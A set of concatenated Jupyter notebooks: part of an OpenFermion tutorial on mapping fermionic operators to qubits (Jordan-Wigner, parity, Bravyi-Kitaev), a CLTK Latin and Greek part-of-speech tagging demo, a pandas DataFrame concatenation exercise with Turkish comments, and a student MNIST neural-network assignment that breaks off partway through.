# $$\lvert n_0, \ldots, n_{N-1} \rangle :=
# (a^\dagger_0)^{n_0} \cdots (a^\dagger_{N-1})^{n_{N-1}} \lvert{\text{vac}}\rangle,
# \qquad n_0, \ldots, n_{N-1} \in \{0, 1\}$$
# are orthonormal. We can assume they form a basis for the entire vector space.
#
# - The annihilation operators $a_p$ act on this basis as follows:
# $$\begin{aligned} a_p \lvert n_0, \ldots, n_{p-1}, 1, n_{p+1}, \ldots, n_{N-1} \rangle &= (-1)^{\sum_{q=0}^{p-1} n_q} \lvert n_0, \ldots, n_{p-1}, 0, n_{p+1}, \ldots, n_{N-1} \rangle \,, \\ a_p \lvert n_0, \ldots, n_{p-1}, 0, n_{p+1}, \ldots, n_{N-1} \rangle &= 0 \,.\end{aligned}$$
#
# See [here](http://michaelnielsen.org/blog/archive/notes/fermions_and_jordan_wigner.pdf) for a derivation and discussion of these
# consequences.
#
# ## Mapping fermions to qubits with transforms
#
# To simulate a system of fermions on a quantum computer, we must choose a representation of the ladder operators on the Hilbert space of the qubits. In other words, we must designate a set of qubit operators (matrices) which satisfy the canonical anticommutation relations. Qubit operators are written in terms of the Pauli matrices $X$, $Y$, and $Z$. In OpenFermion a representation is specified by a transform function which maps fermionic operators (typically instances of FermionOperator) to qubit operators (instances of QubitOperator). In this demo we will discuss the Jordan-Wigner and Bravyi-Kitaev transforms, which are implemented by the functions `jordan_wigner` and `bravyi_kitaev`.
#
# ### The Jordan-Wigner Transform
# Under the Jordan-Wigner Transform (JWT), the annihilation operators are mapped to qubit operators as follows:
# $$\begin{aligned}
# a_p &\mapsto \frac{1}{2} (X_p + \mathrm{i}Y_p) Z_1 \cdots Z_{p - 1} \\
# &= (\lvert{0}\rangle\langle{1}\rvert)_p Z_1 \cdots Z_{p - 1} \\
# &=: \tilde{a}_p.
# \end{aligned}$$
#
# This operator has the following action on a computational basis vector
# $\lvert z_0, \ldots, z_{N-1} \rangle$:
# $$\begin{aligned}
# \tilde{a}_p \lvert z_0 \ldots, z_{p-1}, 1, z_{p+1}, \ldots, z_{N-1} \rangle &=
# (-1)^{\sum_{q=0}^{p-1} z_q} \lvert z_0 \ldots, z_{p-1}, 0, z_{p+1}, \ldots, z_{N-1} \rangle \\
# \tilde{a}_p \lvert z_0 \ldots, z_{p-1}, 0, z_{p+1}, \ldots, z_{N-1} \rangle &= 0.
# \end{aligned}$$
#
# Note that $\lvert n_0, \ldots, n_{N-1} \rangle$ is a basis vector in the Hilbert space of fermions, while $\lvert z_0, \ldots, z_{N-1} \rangle$ is a basis vector in the Hilbert space of qubits. Similarly, in OpenFermion $a_p$ is a FermionOperator while $\tilde{a}_p$ is a QubitOperator.
#
# Let's instantiate some FermionOperators, map them to QubitOperators using the JWT, and check that the resulting operators satisfy the expected relations.
# +
from openfermion import *
# Create some ladder operators
annihilate_2 = FermionOperator('2')
create_2 = FermionOperator('2^')
annihilate_5 = FermionOperator('5')
create_5 = FermionOperator('5^')
# Construct occupation number operators
num_2 = create_2 * annihilate_2
num_5 = create_5 * annihilate_5
# Map FermionOperators to QubitOperators using the JWT
annihilate_2_jw = jordan_wigner(annihilate_2)
create_2_jw = jordan_wigner(create_2)
annihilate_5_jw = jordan_wigner(annihilate_5)
create_5_jw = jordan_wigner(create_5)
num_2_jw = jordan_wigner(num_2)
num_5_jw = jordan_wigner(num_5)
# Create QubitOperator versions of zero and identity
zero = QubitOperator()
identity = QubitOperator(())
# Check the canonical anticommutation relations
assert anticommutator(annihilate_5_jw, annihilate_2_jw) == zero
assert anticommutator(annihilate_5_jw, annihilate_5_jw) == zero
assert anticommutator(annihilate_5_jw, create_2_jw) == zero
assert anticommutator(annihilate_5_jw, create_5_jw) == identity
# Check that the occupation number operators commute
assert commutator(num_2_jw, num_5_jw) == zero
# Print some output
print("annihilate_2_jw = \n{}".format(annihilate_2_jw))
print('')
print("create_2_jw = \n{}".format(create_2_jw))
print('')
print("annihilate_5_jw = \n{}".format(annihilate_5_jw))
print('')
print("create_5_jw = \n{}".format(create_5_jw))
print('')
print("num_2_jw = \n{}".format(num_2_jw))
print('')
print("num_5_jw = \n{}".format(num_5_jw))
# -
# ### The parity transform
#
# By comparing the action of $\tilde{a}_p$ on $\lvert z_0, \ldots, z_{N-1} \rangle$ in the JWT with the action of $a_p$ on $\lvert n_0, \ldots, n_{N-1} \rangle$ (described in the first section of this demo), we can see that the JWT is associated with a particular mapping of bitstrings $e: \{0, 1\}^N \to \{0, 1\}^N$, namely, the identity map $e(x) = x$. In other words, under the JWT, the fermionic basis vector $\lvert n_0, \ldots, n_{N-1} \rangle$ is represented by the computational basis vector $\lvert z_0, \ldots, z_{N-1} \rangle$, where $z_p = n_p$ for all $p$. We can write this as
# $$\lvert x \rangle \mapsto \lvert e(x) \rangle,$$
# where the vector on the left is fermionic and the vector on the right is qubit. We call the mapping $e$ an *encoder*.
#
# There are other transforms which are associated with different encoders. To see why we might be interested in these other transforms, observe that under the JWT, $\tilde{a}_p$ acts not only on qubit $p$ but also on qubits $0, \ldots, p-1$. This means that fermionic operators with low weight can get mapped to qubit operators with high weight, where by weight we mean the number of modes or qubits an operators acts on. There are some disadvantages to having high-weight operators; for instance, they may require more gates to simulate and are more expensive to measure on some near-term hardware platforms. In the worst case, the annihilation operator on the last mode will map to an operator which acts on all the qubits. To emphasize this point let's apply the JWT to the annihilation operator on mode 99:
print(jordan_wigner(FermionOperator('99')))
# The purpose of the string of Pauli $Z$'s is to introduce the phase factor $(-1)^{\sum_{q=0}^{p-1} n_q}$ when acting on a computational basis state; when $e$ is the identity encoder, the modulo-2 sum $\sum_{q=0}^{p-1} n_q$ is computed as $\sum_{q=0}^{p-1} z_q$, which requires reading $p$ bits and leads to a Pauli $Z$ string with weight $p$. A simple solution to this problem is to consider instead the encoder defined by
# $$e(x)_p = \sum_{q=0}^p x_q \quad (\text{mod 2}),$$
# which is associated with the mapping of basis vectors
# $\lvert n_0, \ldots, n_{N-1} \rangle \mapsto \lvert z_0, \ldots, z_{N-1} \rangle,$
# where $z_p = \sum_{q=0}^p n_q$ (again addition is modulo 2). With this encoding, we can compute the sum $\sum_{q=0}^{p-1} n_q$ by reading just one bit because this is the value stored by $z_{p-1}$. The associated transform is called the parity transform because the $p$-th qubit is storing the parity (modulo-2 sum) of modes $0, \ldots, p$. Under the parity transform, annihilation operators are mapped as follows:
# $$\begin{aligned}
# a_p &\mapsto \frac{1}{2} (X_p Z_{p - 1} + \mathrm{i}Y_p) X_{p + 1} \cdots X_{N} \\
# &= \frac{1}{4} [(X_p + \mathrm{i} Y_p) (I + Z_{p - 1}) -
# (X_p - \mathrm{i} Y_p) (I - Z_{p - 1})]
# X_{p + 1} \cdots X_{N} \\
# &= [(\lvert{0}\rangle\langle{1}\rvert)_p (\lvert{0}\rangle\langle{0}\rvert)_{p - 1} -
# (\lvert{0}\rangle\langle{1}\rvert)_p (\lvert{1}\rangle\langle{1}\rvert)_{p - 1}]
# X_{p + 1} \cdots X_{N} \\
# \end{aligned}$$
#
# The term in brackets in the last line means "if $z_p = n_p$ then annihilate in mode $p$; otherwise, create in mode $p$ and attach a minus sign". The value stored by $z_{p-1}$ contains the information needed to determine whether a minus sign should be attached or not. However, now there is a string of Pauli $X$'s acting on modes $p+1, \ldots, N-1$ and hence using the parity transform also yields operators with high weight. These Pauli $X$'s perform the necessary update to $z_{p+1}, \ldots, z_{N-1}$ which is needed if the value of $n_{p}$ changes. In the worst case, the annihilation operator on the first mode will map to an operator which acts on all the qubits.
#
# Since the parity transform does not offer any advantages over the JWT, OpenFermion does not include a standalone function to perform it. However, there is functionality for defining new transforms by specifying an encoder and decoder pair, also known as a binary code (in our examples the decoder is simply the inverse mapping), and the binary code which defines the parity transform is included in the library as an example. See [Lowering qubit requirements using binary codes](./binary_code_transforms_demo.ipynb) for a demonstration of this functionality and how it can be used to reduce the qubit resources required for certain applications.
#
# Let's use this functionality to map our previously instantiated FermionOperators to QubitOperators using the parity transform with 10 total modes and check that the resulting operators satisfy the expected relations.
# +
# Set the number of modes in the system
n_modes = 10
# Define a function to perform the parity transform
def parity(fermion_operator, n_modes):
return binary_code_transform(fermion_operator, parity_code(n_modes))
# Map FermionOperators to QubitOperators using the parity transform
annihilate_2_parity = parity(annihilate_2, n_modes)
create_2_parity = parity(create_2, n_modes)
annihilate_5_parity = parity(annihilate_5, n_modes)
create_5_parity = parity(create_5, n_modes)
num_2_parity = parity(num_2, n_modes)
num_5_parity = parity(num_5, n_modes)
# Check the canonical anticommutation relations
assert anticommutator(annihilate_5_parity, annihilate_2_parity) == zero
assert anticommutator(annihilate_5_parity, annihilate_5_parity) == zero
assert anticommutator(annihilate_5_parity, create_2_parity) == zero
assert anticommutator(annihilate_5_parity, create_5_parity) == identity
# Check that the occupation number operators commute
assert commutator(num_2_parity, num_5_parity) == zero
# Print some output
print("annihilate_2_parity = \n{}".format(annihilate_2_parity))
print('')
print("create_2_parity = \n{}".format(create_2_parity))
print('')
print("annihilate_5_parity = \n{}".format(annihilate_5_parity))
print('')
print("create_5_parity = \n{}".format(create_5_parity))
print('')
print("num_2_parity = \n{}".format(num_2_parity))
print('')
print("num_5_parity = \n{}".format(num_5_parity))
# -
# Now let's map one of the FermionOperators again but with the total number of modes set to 100.
print(parity(annihilate_2, 100))
# Note that with the JWT, it is not necessary to specify the total number of modes in the system because $\tilde{a}_p$ only acts on qubits $0, \ldots, p$ and not any higher ones.
# ### The Bravyi-Kitaev transform
#
# The discussion above suggests that we can think of the action of a transformed annihilation operator $\tilde{a}_p$ on a computational basis vector $\lvert z \rangle$ as a 4-step classical algorithm:
# 1. Check if $n_p = 0$. If so, then output the zero vector. Otherwise,
# 2. Update the bit stored by $z_p$.
# 3. Update the rest of the bits $z_q$, $q \neq p$.
# 4. Multiply by the parity $\sum_{q=0}^{p-1} n_p$.
#
# Under the JWT, Steps 1, 2, and 3 are represented by the operator $(\lvert{0}\rangle\langle{1}\rvert)_p$ and Step 4 is accomplished by the operator $Z_{0} \cdots Z_{p-1}$ (Step 3 actually requires no action).
# Under the parity transform, Steps 1, 2, and 4 are represented by the operator
# $(\lvert{0}\rangle\langle{1}\rvert)_p (\lvert{0}\rangle\langle{0}\rvert)_{p - 1} -
# (\lvert{0}\rangle\langle{1}\rvert)_p (\lvert{1}\rangle\langle{1}\rvert)_{p - 1}$ and Step 3 is accomplished by the operator $X_{p+1} \cdots X_{N-1}$.
#
# To obtain a simpler description of these and other transforms (with an aim at generalizing), it is better to put aside the ladder operators and work with an alternative set of $2N$ operators defined by
# $$c_p = a_p + a_p^\dagger\,, \qquad d_p = -\mathrm{i} (a_p - a_p^\dagger)\,.$$
# These operators are known as Majorana operators. Note that if we describe how Majorana operators should be transformed, then we also know how the annihilation operators should be transformed, since
# $$a_p = \frac{1}{2} (c_p + \mathrm{i} d_p).$$
#
# For simplicity, let's consider just the $c_p$; the $d_p$ are treated similarly. The action of $c_p$ on a fermionic basis vector is given by
# $$c_p \lvert n_0, \ldots, n_{p-1}, n_p, n_{p+1}, \ldots, n_{N-1} \rangle =
# (-1)^{\sum_{q=0}^{p-1} n_q} \lvert n_0, \ldots, n_{p-1}, 1 - n_p, n_{p+1}, \ldots, n_{N-1} \rangle$$
#
# In words, $c_p$ flips the occupation of mode $p$ and multiplies by the ever-present parity factor. If we transform $c_p$ to a qubit operator $\tilde{c}_p$, we should be able to describe the action of $\tilde{c}_p$ on a computational basis vector $\lvert z \rangle$ with a 2-step classical algorithm:
# 1. Update the string $z$ to a new string $z'$.
# 2. Multiply by the parity $\sum_{q=0}^{p-1} n_q$.
#
# Step 1 amounts to flipping some bits, so it will be performed by some Pauli $X$'s, and Step 2 will be performed by some Pauli $Z$'s. So $\tilde{c}_p$ should take the form
# $$\tilde{c}_p = X_{U(p)} Z_{P(p - 1)},$$
# where $U(j)$ is the set of bits that need to be updated upon flipping $n_j$, and $P(j)$ is a set of bits that stores the sum $\sum_{q=0}^{j} n_q$ (let's define $P(-1)$ to be the empty set). Let's see how this looks under the JWT and parity transforms.
# +
# Create a Majorana operator from our existing operators
c_5 = annihilate_5 + create_5
# Set the number of modes (required for the parity transform)
n_modes = 10
# Transform the Majorana operator to a QubitOperator in two different ways
c_5_jw = jordan_wigner(c_5)
c_5_parity = parity(c_5, n_modes)
# Print some output
print("c_5_jw = \n{}".format(c_5_jw))
print('')
print("c_5_parity = \n{}".format(c_5_parity))
# -
# For the JWT, $U(j) = \{j\}$ and $P(j) = \{0, \ldots, j\}$, whereas for the parity transform, $U(j) = \{j, \ldots, N-1\}$ and $P(j) = \{j\}$. The size of these sets can be as large as $N$, the total number of modes. These sets are determined by the encoding function $e$.
#
# It is possible to pick a clever encoder with the property that these sets have size $O(\log N)$. The corresponding transform will map annihilation operators to qubit operators with weight $O(\log N)$, which is much smaller than the $\Omega(N)$ weight associated with the JWT and parity transforms. This fact was noticed by [Bravyi and Kitaev](https://arxiv.org/abs/quant-ph/0003137), and later [Havlíček and others](https://arxiv.org/abs/1701.07072) pointed out that the encoder which achieves this is implemented by a classical data structure called a Fenwick tree. The transforms described in these two papers actually correspond to different variants of the Fenwick tree data structure and give different results when the total number of modes is not a power of 2. OpenFermion implements the one from the first paper as `bravyi_kitaev` and the one from the second paper as `bravyi_kitaev_tree`. Generally, the first one (`bravyi_kitaev`) is preferred because it results in operators with lower weight and is faster to compute.
#
# Let's transform our previously instantiated Majorana operator using the Bravyi-Kitaev transform.
c_5_bk = bravyi_kitaev(c_5, n_modes)
print("c_5_bk = \n{}".format(c_5_bk))
# The advantage of the Bravyi-Kitaev transform is not apparent in a system with so few modes. Let's look at a system with 100 modes.
# +
n_modes = 100
# Initialize some Majorana operators
c_17 = FermionOperator('[17] + [17^]')
c_50 = FermionOperator('[50] + [50^]')
c_73 = FermionOperator('[73] + [73^]')
# Map to QubitOperators
c_17_jw = jordan_wigner(c_17)
c_50_jw = jordan_wigner(c_50)
c_73_jw = jordan_wigner(c_73)
c_17_parity = parity(c_17, n_modes)
c_50_parity = parity(c_50, n_modes)
c_73_parity = parity(c_73, n_modes)
c_17_bk = bravyi_kitaev(c_17, n_modes)
c_50_bk = bravyi_kitaev(c_50, n_modes)
c_73_bk = bravyi_kitaev(c_73, n_modes)
# Print some output
print("Jordan-Wigner\n"
"-------------")
print("c_17_jw = \n{}".format(c_17_jw))
print('')
print("c_50_jw = \n{}".format(c_50_jw))
print('')
print("c_73_jw = \n{}".format(c_73_jw))
print('')
print("Parity\n"
"------")
print("c_17_parity = \n{}".format(c_17_parity))
print('')
print("c_50_parity = \n{}".format(c_50_parity))
print('')
print("c_73_parity = \n{}".format(c_73_parity))
print('')
print("Bravyi-Kitaev\n"
"-------------")
print("c_17_bk = \n{}".format(c_17_bk))
print('')
print("c_50_bk = \n{}".format(c_50_bk))
print('')
print("c_73_bk = \n{}".format(c_73_bk))
# -
# Now let's go back to a system with 10 modes and check that the Bravyi-Kitaev transformed operators satisfy the expected relations.
# +
# Set the number of modes in the system
n_modes = 10
# Map FermionOperators to QubitOperators using the Bravyi-Kitaev transform
annihilate_2_bk = bravyi_kitaev(annihilate_2, n_modes)
create_2_bk = bravyi_kitaev(create_2, n_modes)
annihilate_5_bk = bravyi_kitaev(annihilate_5, n_modes)
create_5_bk = bravyi_kitaev(create_5, n_modes)
num_2_bk = bravyi_kitaev(num_2, n_modes)
num_5_bk = bravyi_kitaev(num_5, n_modes)
# Check the canonical anticommutation relations
assert anticommutator(annihilate_5_bk, annihilate_2_bk) == zero
assert anticommutator(annihilate_5_bk, annihilate_5_bk) == zero
assert anticommutator(annihilate_5_bk, create_2_bk) == zero
assert anticommutator(annihilate_5_bk, create_5_bk) == identity
# Check that the occupation number operators commute
assert commutator(num_2_bk, num_5_bk) == zero
# Print some output
print("annihilate_2_bk = \n{}".format(annihilate_2_bk))
print('')
print("create_2_bk = \n{}".format(create_2_bk))
print('')
print("annihilate_5_bk = \n{}".format(annihilate_5_bk))
print('')
print("create_5_bk = \n{}".format(create_5_bk))
print('')
print("num_2_bk = \n{}".format(num_2_bk))
print('')
print("num_5_bk = \n{}".format(num_5_bk))
|
docs/tutorials/jordan_wigner_and_bravyi_kitaev_transforms.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Latin
#
# For Latin POS tags, see https://github.com/cltk/latin_treebank_perseus.
# +
aen = """arma virumque cano, Troiae qui primus ab oris
Italiam, fato profugus, Laviniaque venit
litora, multum ille et terris iactatus et alto
vi superum saevae memorem Iunonis ob iram;
multa quoque et bello passus, dum conderet urbem, 5
inferretque deos Latio, genus unde Latinum,
Albanique patres, atque altae moenia Romae."""
# # rm line breaks
aen = aen.replace('\n',' ')
# -
print(aen)
from cltk.tag.pos import POSTag
tagger = POSTag('latin')
aen_tagged = tagger.tag_ngram_123_backoff(aen)
print(aen_tagged)
# +
# There are options, as the following
aen_tagged = tagger.tag_crf('Gallia est omnis divisa in partes tres')
# -
print(aen_tagged)
# # Greek
#
# For Greek POS tags, see https://github.com/cltk/greek_treebank_perseus.
athenaeus = "Ἀθήναιος μὲν ὁ τῆς βίβλου πατήρ· ποιεῖται δὲ τὸν λόγον πρὸς Τιμοκράτην· Δειπνοσοφιστὴς δὲ ταύτῃ τὸ ὄνομα. Ὑπόκειται δὲ τῷ λόγῳ Λαρήνσιος Ῥωμαῖος, ἀνὴρ τῇ τύχῃ περιφανής, τοὺς κατὰ πᾶσαν παιδείαν ἐμπειροτάτους ἐν αὑτοῦ δαιτυμόνας ποιούμενος·"
# +
from cltk.tag.pos import POSTag
tagger = POSTag('greek')
# Using another tagger
athenaeus_tagged = tagger.tag_tnt(athenaeus)
print(athenaeus_tagged)
|
8 Part-of-speech tagging.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import pandas as pd
m = np.random.randint(1,30, size=(5,3))
df1 = pd.DataFrame(m, columns = ["var1", "var2", "var3"])
df1
# -
df2 = df1 + 99
df2
pd.concat([df1,df2]) #indexlemede hata yapıyor birlestirirken tekrar 0dan baslıyor
# + jupyter={"outputs_hidden": true}
# ?pd.concat
# -
pd.concat([df1,df2], ignore_index = True) #fonksiyonun argümanına baktık, indexle alakalı bir tane şey vardı zaten alıp kullandık
# +
#indexleri kendimiz isimlendirmiş olsaydık gitmelerini istemezdik ignore_indexe gerek kalmazdı
# -
df2.columns = ["var1", "var2", "deg3"]
pd.concat([df1, df2]) #"deg3" her ikisinde ortak olmadığı icin hata gibi birşey zanneti
#degerleri NaN yaptı
pd.concat([df1, df2], join = "inner") #hatalı gördüğü kısımları attı,
#kesişimleri elemanlardan olan değişkenlere göre birleştirme yaptı kesişime göre
pd.concat([df1, df2], join_axes = [df1.columns])
#islemi sadece df1'in degiskenlerine göre yap örneğin var1 var2 hepsinde ortak
#ancak df1'de var3 de var ama df2 de deg3 var, df1in degiskenine göre yap demistik,
#o yüzden var3 ü alır
# ?pd.concat
|
pandas_dataFrame_birlestirme_join_islemleri.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# assignment 6
# MSDS 422
# Professor <NAME>
# https://github.com/ageron/handson-ml/blob/master/10_introduction_to_artificial_neural_networks.ipynb
# https://github.com/ageron/handson-ml/blob/master/11_deep_learning.ipynb
# https://github.com/ageron/handson-ml/blob/master/12_distributed_tensorflow.ipynb
# more info
# https://www.datacamp.com/community/tutorials/cnn-tensorflow-python
# https://scikit-learn.org/stable/modules/generated/sklearn.neural_network.MLPClassifier.html
# really wonderful resource for noobs
# https://machinelearningmastery.com/rectified-linear-activation-function-for-deep-learning-neural-networks/
# -
# <div style="text-align: right"><b>pkg imports</b></div>
# +
# basix
import numpy as np
import pandas as pd
import seaborn as sns
import math
import random
import time
# prep
from sklearn.model_selection import train_test_split
from sklearn.model_selection import KFold
from sklearn.model_selection import GridSearchCV
from sklearn.preprocessing import StandardScaler
#modeling
from sklearn.linear_model import Perceptron
from sklearn.neural_network import MLPClassifier
import tensorflow as tf
from keras.models import Sequential
from keras.layers import Flatten
from keras.layers import Dense
# other
# %matplotlib inline
import matplotlib.pyplot as plt
# -
# <div style="text-align: right"><b>configs, table setup</b></div>
# +
"""
for sci-kit:
‘identity’, no-op activation, useful to implement linear bottleneck, returns f(x) = x
‘logistic’, the logistic sigmoid function, returns f(x) = 1 / (1 + exp(-x)).
‘tanh’, the hyperbolic tan function, returns f(x) = tanh(x).
‘relu’, the rectified linear unit function, returns f(x) = max(0, x)
for tf/keras, the same, respectively:
linear
sigmoid
tanh
relu
also (with tf):
selu
"""
#sk_act_fun = "identity"
#sk_act_fun = "logistic"
sk_act_fun = "tanh"
#sk_act_fun = "relu"
tf_act_fun = "tanh"
# -
pd.options.display.float_format = "{:,.4f}".format
RANDOM_SEED = 8675309
responseVar = "label"
# +
# setup for consolidated table, later
table = {"model 1":{"pkg":"sci-kit","act'n fn":"tanh","nbr_layers":None,"nodes_p_layer":None,"processing_time":None,"trainset_acc":None,"testset_acc":None},
"model 2":{"pkg":"sci-kit","act'n fn":"tanh","nbr_layers":None,"nodes_p_layer":None,"processing_time":None,"trainset_acc":None,"testset_acc":None},
"model 3":{"pkg":"sci-kit","act'n fn":"tanh","nbr_layers":None,"nodes_p_layer":None,"processing_time":None,"trainset_acc":None,"testset_acc":None},
"model 4":{"pkg":"sci-kit","act'n fn":"tanh","nbr_layers":None,"nodes_p_layer":None,"processing_time":None,"trainset_acc":None,"testset_acc":None},
"model 5":{"pkg":"tf/keras","act'n fn":"tanh","nbr_layers":None,"nodes_p_layer":None,"processing_time":None,"trainset_acc":None,"testset_acc":None},
"model 6":{"pkg":"tf/keras","act'n fn":"tanh","nbr_layers":None,"nodes_p_layer":None,"processing_time":None,"trainset_acc":None,"testset_acc":None},
"model 7":{"pkg":"tf/keras","act'n fn":"tanh","nbr_layers":None,"nodes_p_layer":None,"processing_time":None,"trainset_acc":None,"testset_acc":None},
"model 8":{"pkg":"tf/keras","act'n fn":"tanh","nbr_layers":None,"nodes_p_layer":None,"processing_time":None,"trainset_acc":None,"testset_acc":None}
}
pd.DataFrame(table).transpose().head(2)
# -
# <div style="text-align: right"><b>defining things for model</b></div>
# +
# activation function
def sigmoid(z):
return 1 / (1 + np.exp(-z))
# lambda x: 1 / (1 + np.exp(-x))
# +
training_iters = 10
learning_rate = 0.01
b_size = 128
# MNIST data input (img shape: 28*28)
n_input = 28
# MNIST total classes (0-9 digits)
n_classes = 10
# -
# <div style="text-align: right"><b>data setup for scikit</b></div>
sk_mnist_train = pd.read_csv('train.csv')
sk_mnist_test = pd.read_csv('test.csv')
sk_mnist = pd.concat([sk_mnist_test, sk_mnist_train.drop(columns = "label")]) # combines the rows of 2 datasets
max(pd.DataFrame(sk_mnist.describe()).loc[["max"],])
pd.DataFrame(sk_mnist.describe()["pixel99"]).loc[["count","mean","std","min","max"],]
print("le shape of le train is le : ", sk_mnist_train.shape)
print("le shape of le test : ", sk_mnist_test.shape)
# 'test' data is our future data
sk_future_data = sk_mnist_test
sk_mnist = sk_mnist_train
del(sk_mnist_test)
del(sk_mnist_train)
# +
try:
sk_mnist_test
except NameError as e:
print(e) # meow
try:
sk_mnist_train
except NameError as e:
print(e) # meow
# -
#X = mnist_scaled.loc[:, mnist_scaled.columns != responseVar]
#y = mnist_scaled[responseVar]
sk_X = sk_mnist.loc[:, sk_mnist.columns != responseVar]
sk_y = sk_mnist[responseVar]
pd.DataFrame(sk_mnist.describe()["pixel774"]).loc[["count","mean","std","min","max"],]
scaler = StandardScaler()
sk_np_mnist_x = scaler.fit_transform(sk_X)
sk_X_scaled = pd.DataFrame(sk_np_mnist_x, index=sk_X.index, columns=sk_X.columns)
pd.DataFrame(sk_X_scaled.describe()["pixel774"]).loc[["count","mean","std","min","max"],]
sk_X_train, sk_X_test, sk_y_train, sk_y_test = train_test_split(sk_X_scaled, sk_y,
train_size=0.7,
test_size=0.3,
shuffle=True,
random_state=RANDOM_SEED)
# <div style="text-align: right"><b>data setup for tensorflow</b></div>
from keras.datasets import mnist
(tf_X_train, tf_y_train), (tf_X_test, tf_y_test) = mnist.load_data()
tf_X_valid, tf_X_train = tf_X_train[:5000] / 255.0, tf_X_train[5000:] / 255.0
tf_y_valid, tf_y_train = tf_y_train[:5000], tf_y_train[5000:]
tf_X_test = tf_X_test / 255.0
# <div style="text-align: right"><b>model 1 : 2x1. 2 layers w 1 neuron each. sci-kit</b></div>
print("approximate start time : ", time.asctime())
start1 = time.perf_counter()
twox1 = MLPClassifier(hidden_layer_sizes = (2, 1), # neurons comma layers
activation = sk_act_fun,
alpha = learning_rate,
batch_size = b_size).fit(sk_X_train,
sk_y_train)
stop1 = time.perf_counter()
tm1 = round(stop1 - start1)
print("approximate completion time : ", time.asctime())
print("time of execution in seconds : ", tm1)
print("time of execution in minutes : ", round(tm1/60, 1))
table["model 1"]["nbr_layers"] = "1"
table["model 1"]["nodes_p_layer"] = "2"
table["model 1"]["processing_time"] = tm1
table["model 1"]["testset_acc"] = twox1.score(sk_X_test, sk_y_test)
table["model 1"]["trainset_acc"] = twox1.score(sk_X_train, sk_y_train)
# <div style="text-align: right"><b>model 2 : 2x2. 2 layers w 2 neurons each. I think. sci-kit</b></div>
print("approximate start time : ", time.asctime())
start2 = time.perf_counter()
twox2 = MLPClassifier(hidden_layer_sizes = (2, 2),
activation = sk_act_fun,
alpha = learning_rate,
batch_size = b_size).fit(sk_X_train,
sk_y_train)
stop2 = time.perf_counter()
tm2 = round(stop2 - start2)
print("approximate completion time : ", time.asctime())
print("time of execution in seconds : ", tm2)
print("time of execution in minutes : ", round(tm2/60, 1))
table["model 2"]["nbr_layers"] = "2"
table["model 2"]["nodes_p_layer"] = "2"
table["model 2"]["processing_time"] = tm2
table["model 2"]["testset_acc"] = twox2.score(sk_X_test, sk_y_test)
table["model 2"]["trainset_acc"] = twox2.score(sk_X_train, sk_y_train)
# <div style="text-align: right"><b>model 3 : x1. 30 layers w 4 neurons each. sci-kit</b></div>
print("approximate start time : ", time.asctime())
start3 = time.perf_counter()
thirtyx4 = MLPClassifier(hidden_layer_sizes = (30, 4),
activation = sk_act_fun,
alpha = learning_rate,
batch_size = b_size).fit(sk_X_train,
sk_y_train)
stop3 = time.perf_counter()
tm3 = round(stop3 - start3)
print("approximate completion time : ", time.asctime())
print("time of execution in seconds : ", tm3)
print("time of execution in minutes : ", round(tm3/60, 1))
table["model 3"]["nbr_layers"] = "30"
table["model 3"]["nodes_p_layer"] = "4"
table["model 3"]["processing_time"] = tm3
table["model 3"]["testset_acc"] = thirtyx4.score(sk_X_test, sk_y_test)
table["model 3"]["trainset_acc"] = thirtyx4.score(sk_X_train, sk_y_train)
# <div style="text-align: right"><b>model 4 : x1. 4 layers, each w 30 neurons. sci-kit</b></div>
print("approximate start time : ", time.asctime())
start4 = time.perf_counter()
fourx30 = MLPClassifier(hidden_layer_sizes = (4, 30),
activation = sk_act_fun,
alpha = learning_rate,
batch_size = b_size).fit(sk_X_train,
sk_y_train)
stop4 = time.perf_counter()
tm4 = round(stop4 - start4)
print("approximate completion time : ", time.asctime())
print("time of execution in seconds : ", tm4)
print("time of execution in minutes : ", round(tm4/60, 1))
table["model 4"]["nbr_layers"] = "4"
table["model 4"]["nodes_p_layer"] = "30"
table["model 4"]["processing_time"] = tm4
table["model 4"]["testset_acc"] = fourx30.score(sk_X_test, sk_y_test)
table["model 4"]["trainset_acc"] = fourx30.score(sk_X_train, sk_y_train)
# <div style="text-align: right"><b>model 5 : 2x1. 2 layers w 1 neurons each</b></div>
print("approximate start time : ", time.asctime())
start5 = time.perf_counter()
#classification MLP with two hidden layers
model5 = Sequential()
model5.add(Flatten(input_shape=[28, 28]))
model5.add(Dense(1, activation=tf_act_fun))
model5.add(Dense(1, activation=tf_act_fun))
model5.add(Dense(10, activation="softmax"))
model5.summary()
model5.compile(loss="sparse_categorical_crossentropy",
optimizer="sgd",
metrics=["accuracy"])
history5 = model5.fit(tf_X_train, tf_y_train, epochs=5,
validation_data=(tf_X_valid, tf_y_valid))
stop5 = time.perf_counter()
tm5 = round(stop5 - start5)
print("approximate completion time : ", time.asctime())
print("time of execution in seconds : ", tm5)
print("time of execution in minutes : ", round(tm5/60, 1))
table["model 5"]["nbr_layers"] = "2"
table["model 5"]["nodes_p_layer"] = "1"
table["model 5"]["processing_time"] = tm5
table["model 5"]["testset_acc"] = model5.evaluate(tf_X_test, tf_y_test)[1]
table["model 5"]["trainset_acc"] = model5.evaluate(tf_X_train, tf_y_train)[1]
# <div style="text-align: right"><b>model 6 : 2x2. 2 layers w 2 neurons each</b></div>
print("approximate start time : ", time.asctime())
start6 = time.perf_counter()
#classification MLP with two hidden layers
model6 = Sequential()
model6.add(Flatten(input_shape=[28, 28]))
model6.add(Dense(2, activation=tf_act_fun))
model6.add(Dense(2, activation=tf_act_fun))
model6.add(Dense(10, activation="softmax"))
model6.summary()
model6.compile(loss="sparse_categorical_crossentropy",
optimizer="sgd",
metrics=["accuracy"])
history6 = model6.fit(tf_X_train, tf_y_train, epochs=5,
validation_data=(tf_X_valid, tf_y_valid))
stop6 = time.perf_counter()
tm6 = round(stop6 - start6)
print("approximate completion time : ", time.asctime())
print("time of execution in seconds : ", tm6)
print("time of execution in minutes : ", round(tm6/60, 1))
table["model 6"]["nbr_layers"] = "2"
table["model 6"]["nodes_p_layer"] = "2"
